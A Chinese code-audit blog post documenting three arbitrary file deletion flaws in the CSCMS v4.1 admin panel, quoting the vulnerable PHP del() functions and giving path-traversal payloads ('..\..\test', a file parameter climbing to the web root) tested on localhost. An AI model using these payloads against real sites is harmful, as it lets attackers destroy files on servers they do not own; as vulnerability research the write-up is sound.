zoukankan      html  css  js  c++  java
  • 【代码审计】任意文件删除漏洞实例

    任意文件删除漏洞,该漏洞可让攻击者随意删除服务器上的任意文件。

    环境搭建:

    CSCMS :http://www.chshcms.com/

    网站源码版本:Cscms_v4.1正式版(发布日期:2017-06-05)

    程序源码下载:https://github.com/chshcms/cscms

    漏洞实例一:

    漏洞文件位置:cscmspluginssysadminBasedb.php  第160-177行:

             public function del(){
    
                       $dir = $this->input->get_post('id',true);
    
                       if(empty($dir)){
    
                                getjson(L('plub_11'));
    
                       }
    
                       $dirs = array();
    
                       if(!is_array($dir)){
    
                                $dirs[] = $dir;
    
                       }else{
    
                                $dirs = $dir;
    
                       }
    
                       foreach($dirs as $dir) {
    
                deldir(FCPATH.'attachment/backup/'.$dir);
    
                       }
    
                       $info['msg'] = L('plub_12');
    
                       $info['url'] = site_url('basedb/restore').'?v='.rand(1000,9999);
    
            getjson($info,0);
    
             }

    漏洞利用:

    1、  根目录下新建test目录作为测试:

     

    2、  构造参数成功删除test目录

    http://127.0.0.1/admin.php/basedb/del

    POST:id=..\..\test

     

    漏洞实例二:

    漏洞文件位置:/plugins/sys/admin/Skin.php 第418--440行:

             public function del(){
    
            $ac = $this->input->get('ac',true);
    
            $op = $this->input->get('op',true);
    
            $dir = $this->input->get('dirs',true);
    
            $file = $this->input->get('file');
    
                       if($ac!='mobile') $ac='pc';
    
                       if($op!='home' && $op!='user') $op='skins';
    
                       if(empty($dir)) getjson(L('plub_27'));
    
     
    
            $skin_dir = VIEWPATH.$ac.FGF.$op.FGF.$dir.FGF.$file;
    
                       if (!is_dir($skin_dir)) {  //文件
    
                  $res=unlink($skin_dir);
    
                       }else{  //目录
    
                  $res=deldir($skin_dir);
    
                       }
    
                       if($res){
    
                $info['url'] = site_url('skin').'?ac='.$ac.'&op='.$op.'&v='.rand(1000,9999);
    
                $info['msg'] = L('plub_46');
    
                $info['turn'] = 1;
    
                getjson($info,0);
    
                       }else{
    
                getjson(L('plub_28'));
    
                       }

    漏洞利用:

    网站根目录下新建1.txt文件作为测试,构造URL成功删除文件

    Payload:http://127.0.0.1/admin.php/skin/del?ac=pc&op=skins&dirs=default&file=..\..\..\..\1.txt

     

    漏洞实例三:

    漏洞文件位置:/plugins/sys/admin/Plugins.php 第285-299行:

      public function del(){
    
                 $dir = $this->input->get_post('dir',true);
    
                 if($dir==''){
    
                          getjson(L('plub_del_0'),1);
    
                 }
    
            deldir(FCPATH.'plugins'.FGF.$dir.FGF);
    
                       //删除配置目录
    
            deldir(CSCMS.$dir.FGF);
    
                       //删除模板目录
    
            deldir(FCPATH.'tpl/admin/'.$dir.FGF);
    
            $info['func'] = __FUNCTION__;
    
            $info['msg'] = L('plub_del_1');
    
            getjson($info,0);
    
             }

    漏洞利用:

     

    关于我:一个网络安全爱好者,致力于分享原创高质量干货,欢迎关注我的个人微信公众号:Bypass--,浏览更多精彩文章。

  • 相关阅读:
    LevelDB
    Erlang的gen_server的terminate()/2未执行
    集群间心跳检测
    AI从业者关于数学的一些小建议
    《百面机器学习》拾贝----第三章:经典算法
    Demo——Image classification
    《百面机器学习》拾贝----第二章:模型评估
    《百面机器学习》拾贝----第一章:特征工程
    算法工程师---职业生涯规划
    License Plate Detection and Recognition in Unconstrained Scenarios(无约束场景下的车牌检测与识别)
  • 原文地址:https://www.cnblogs.com/xiaozi/p/8990383.html
Copyright © 2011-2022 走看看